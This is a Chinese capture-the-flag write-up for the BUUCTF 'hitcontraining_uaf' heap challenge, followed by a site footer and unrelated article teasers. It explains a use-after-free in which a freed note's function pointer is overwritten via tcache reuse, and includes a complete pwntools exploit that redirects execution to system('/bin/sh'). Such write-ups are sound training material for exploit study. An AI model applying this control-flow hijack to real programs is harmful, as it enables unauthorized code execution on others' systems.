hitcontraining_uaf

BUUCTF[PWN][堆]

题目:BUUCTF在线评测 (buuoj.cn)

  1. 程序del是没有将申请的指针清零,导致可以再次调用输出print。

  2. 查看add_note函数:根据当前 notelist 是否为空,来申请了一个8字节的空间将地址(指针)放在notelist[i]中,申请的空间的前4个字节用来存放 print_note_content 信息。然后又在该申请的空间的后4个字节中,放上了新申请的空间的地址,用来存放后续read输入的字符串。

    image-20240705201733561

    image-20240705204024201

    image-20240705203327521

    image-20240705203352180

  3. 再看一下del_note函数:先是检查了一下index的范围,再检检查一下当前的notelist列表上是否为空,即检查add时第一步申请的空间的指针,后续释放了两次的空间,但是有个问题:该notelist表还没有清空,指向这个地址的指针还存在于notelist中。

  4. 再查看print_note函数:同样检查了index是否查出范围,然后判断当前notelist是否为空,如果指针再里面就直接通过指针调用puts函数输出note的内容。

    image-20240705204015268

  5. 所以我们可以利用UAF,用magic函数的地址来,覆盖掉print_note_content的地址,这样再调用输出时就会直接执行sytem(“/bin/sh”),拿到shell。

    • 先申请两个较大的堆:size=20,但是直接给了32个字节,所以用户申请的空间和程序实际分配的空间不一定相当。

    image-20240705205307078

    • 再释放掉这两个堆:申请的4个空间都进入Tcache bin中,相同的大小再统一个数组中,每个数组中一个链表,上面的是先进入的,下面是后进入的,Tcache 的后入先出原则,下次会将下面的先出链表。

    image-20240705205515040

    • 再申请一个10大小的note:可以看到,程序直接将之前free的两个0x10大小的空间分配给了用户,一个用来参访print_note_content函数内容(add中先申请的,下面的先出链表),一个用来存放read输入的字符串(add中后申请的,上面后出链表)。

      image-20240705210436090

    • 此时仔细观察,就会的发现我们第三次输入的值 cccc ,覆盖掉了第一次申请的堆(0x20大小)中存放的print_note_content函数的地址,如果此时直接调用print_note,就会执行我们输入的值所指向的地址出的代码,所以直接用 magic函数的地址 来作为第三次的输入,覆盖掉原本 print_note_content函数的地址 ,从而挟持程序的控制流,即使在print_note内部检查时,由于(&notelist)[0]处的值不为0(因为程序调用del_note释放时没有清零),仍会执行magic函数。

      image-20240705211337393

      此时index=1和index=2的输出都会是 cccc ,因为题目调用的是同一片空间上的函数地址.UAF的魅力就在于次.

      image-20240705211702253

      image-20240705212121202

  6. EXP:

    from pwn import *
    from LibcSearcher import *
    context(os='linux', arch='amd64', log_level='debug')# p = remote("node5.buuoj.cn",26733)
    p = process("./hacknote")def add(size_,context_):p.sendlineafter(b'Your choice :',b'1')p.sendlineafter(b'Note size :',str(size_).encode())p.sendlineafter(b'Content :',context_.encode())def free(index):p.sendlineafter(b'Your choice :',b'2')p.sendlineafter(b'Index :',str(index).encode())def printf(index):p.sendlineafter(b'Your choice :',b'3')p.sendlineafter(b'Index :',str(index).encode())
    add(20,"aaaa")
    add(20,"bbb")
    free(0)
    free(1)
    #利用UAF
    p.sendlineafter(b'Your choice :',b'1')
    p.sendlineafter(b'Note size :',b'10')
    p.sendline(p32(0x08048945))
    #调用后门函数
    printf(0)
    p.sendline(b'cat flag')
    p.interactive()
    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/41247.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

野指针的概念 如果规避野指针

目录 野指针的概念 有关野指针的代码 如何规避野指针 野指针的概念 野指针就是指针指向的位置是不可知的&#xff08;随机的&#xff0c;不正确的&#xff0c;没有明确限制的&#xff09; 有关野指针的代码 指针未初始化&#xff1a; #include<stdio.h> int main…

Linux 永久挂载磁盘

文章目录 前言一、使用步骤1.命令 总结 前言 一、使用步骤 1.命令 第一步&#xff1a;创建挂载点 sudo mkdir /hhkj 第二步&#xff1a;磁盘挂载到挂载点&#xff08;lsblk、lvdisplay&#xff09; sudo mount /dev/sdb2 /hhkj 或者 sudo mount /dev/centos/home /hhkj 第三…

高阶面试-hbase的整理

背景 冷热分离需要用到hbase&#xff0c;冷数据较多&#xff0c;需求&#xff1a; 存放上亿数据支持简单的组合关键字查询存放数据不需要变更 基本存储数据结构 HBase可以被看作是一个稀疏的多维度Map&#xff08;映射&#xff09;&#xff0c;稀疏的、分布式、多维的Map&a…

使用 mongo2neo4j 和 SemSpect 通过各种方式进行图探索

用于可视化和探索每个 MEAN 堆栈背后的数据图的 ETL 您是否正在努力回答有关 MEANS Web 服务数据的紧急问题&#xff1f;哪里有 BI 可以快速回答“上个季度哪些亚洲的artisan.plus 用户触发了订单&#xff1f;”这个问题&#xff0c;而无需编写查询&#xff1f;使用 mongo2neo4…

深度学习每周学习总结N3(文本分类实战:基本分类(熟悉流程)、textCNN分类(通用模型)、Bert分类(模型进阶))

&#x1f368; 本文为&#x1f517;365天深度学习训练营 中的学习记录博客&#x1f356; 原作者&#xff1a;K同学啊 | 接辅导、项目定制 目录 0. 总结&#xff1a;1. 前期准备环境安装 2. 文本分类基本流程a. 加载数据b.构建词典c.生成数据批次和迭代器d.定义模型及实例e. 定义…

Linux搭建hive手册

一、将hive安装包上传到NameNode节点并解压 1、删除安装MySQL时的.rpm文件 cd /opt/install_packages/ rm -rf *.rpm 2、将安装包拖进/install_packages目录 3、解压安装包 tar -zxvf apache-hive-3.1.2-bin.tar.gz -C /opt/softs/ 4、修改包名 cd /opt/softs mv apache-…

力扣双指针算法题目:复写零

1.题目 . - 力扣&#xff08;LeetCode&#xff09; 2.解题思路 本题要求就是对于一个数组顺序表&#xff0c;将表中的所有“0”元素都向后再写一遍&#xff0c;且我们还要保证此元素之后的元素不受到影响&#xff0c;且复写零之后此数组顺序表的总长度不可以改变&#xff0c;…

OpenCV 灰度直方图及熵的计算

目录 一、概述 1.1灰度直方图 1.1.1灰度直方图的原理 1.1.2灰度直方图的应用 1.1.3直方图的评判标准 1.2熵 二、代码实现 三、实现效果 3.1直方图显示 3.2 熵的计算 一、概述 OpenCV中的灰度直方图是一个关键的工具&#xff0c;用于分析和理解图像的灰度分布情况。直…

ubuntu 网络常用命令

在Ubuntu中&#xff0c;管理和诊断网络问题时会用到一些常用的命令行工具。以下是一些Ubuntu网络常用的命令&#xff1a; ifconfig (已被ip命令替代&#xff0c;但仍在许多系统中可用): 显示或配置网络接口信息。示例&#xff1a;ifconfig 显示所有网络接口信息。ip: 一个多功…

12 Dockerfile详解

目录 1. Dockerfile 2. Dockerfile构建过程 2.1. Dockerfile编写规则&#xff1a; 2.2. Docker执行Dockerfile的大致流程 2.3. 总结 3. Dockerfile指令 3.1. FROM 3.2. MAINTAINER 3.3. RUN 3.4. EXPOSE 3.5. WORKDIR 3.6. USER 3.7. ENV 3.8. VOLUME 3.9. ADD …

mac 11 变编译安装nginx

mac 11 变编译安装nginx 记录一次安装过程 所需要的包 pcre: https://sourceforge.net/projects/pcre/files/pcre/OpenSSL: https://www.openssl.org/source/Nginx: https://nginx.org/en/download.html如果没有pcre 和Openssl,报错如下 把pcre和Openssl 解压到nginx 目录下…

libiw中的函数说明

打开电脑连接wifi是一件很平常的事情,但这些事情通常都是操作系统下的wifi管理程序替我们完成的,如何在程序中连接指定的wifi其实很少有资料介绍,在网络专栏的文章中,有两篇是关于wfi编程的文章,其中对无线网卡的操作都是通过ioctl()完成的,显得有些繁琐和晦涩,但其实WE…

Stable Diffusion与AI艺术:探索人工智能的创造力

引言 随着人工智能&#xff08;AI&#xff09;技术的迅猛发展&#xff0c;AI艺术逐渐走进了公众视野。尤其是近年来&#xff0c;Stable Diffusion等技术的出现&#xff0c;显著提升了AI在艺术创作领域的表现力和创造力。这篇文章将深入探讨Stable Diffusion技术的工作原理、应…

Linux高并发服务器开发(十三)Web服务器开发

文章目录 1 使用的知识点2 http请求get 和 post的区别 3 整体功能介绍4 基于epoll的web服务器开发流程5 服务器代码6 libevent版本的本地web服务器 1 使用的知识点 2 http请求 get 和 post的区别 http协议请求报文格式: 1 请求行 GET /test.txt HTTP/1.1 2 请求行 健值对 3 空…

成长-项目管理

小感悟 制定共同的目标&#xff0c;需要大家都知道&#xff0c; 心里有底。不能高压管理&#xff0c; 需要允许灰色地带的存在。雁行里面&#xff0c;带好领头&#xff0c;表现好的及时表扬&#xff0c;鼓励&#xff0c;正面反馈有利于团队向前飞 方法论 5why分析法 又称“5…

第一次的pentest show总结

第一次的pentest show总结 前言 开始之前&#xff0c;我特别感谢TryHackMe(英)、HackTheBox(美)、zero-point security(英)、offsec(美)等平台&#xff0c;使我们能够通过网络以线上的方式学习与练习&#xff0c;打破传统线下各地区教育资源差异大的限制&#xff0c;对网络教…

【代码随想录算法训练营第37期 第四十三天 | LeetCode518. 零钱兑换 II、377. 组合总和 Ⅳ、70. 爬楼梯】

代码随想录算法训练营第37期 第四十三天 | LeetCode518. 零钱兑换 II、377. 组合总和 Ⅳ、70. 爬楼梯 一、518. 零钱兑换 II 解题代码C&#xff1a; class Solution { public:int change(int amount, vector<int>& coins) {vector<int> dp(amount 1, 0);dp[…

03:EDA的进阶使用

使用EDA设计一个38译码器电路和245放大电路 1、38译码器1.1、查看74HC138芯片数据1.2、电路设计 2、245放大电路2.1、查看数据手册2.2、设计电路 3、绘制PCB3.1、导入3.2、放置3.3、飞线3.4、特殊方式连接GND3.5、泪滴3.6、配置丝印和划分区域3.7、添加typc接口供电 1、38译码器…

20.5.【C语言】求长度的两种方式

1.sizeof 用于测数据类型的长度的函数&#xff08;详细见第3篇&#xff09; 2.strlen 其计算长度时只有遇到\0才会停止&#xff0c;并且\0不会计算在内 如char arr[]{a,1,b}; printf("%d\n",strlen(arr)); 结果是个随机数&#xff01;strlen读内存中的数据&…

Android SurfaceFlinger——Surface和Layer介绍(十九)

按照前面系统开机动画的流程继续分析,在获取到显示屏信息后,下一步就是开始创建 Surface和设置 Layer 层级,这里就出现了两个新的概念——Surface 和 Layer。 一、基本概念 1、Surface介绍 在 Android 系统中,Surface 是一个非常核心的概念,它是用于显示图像的生产者-消…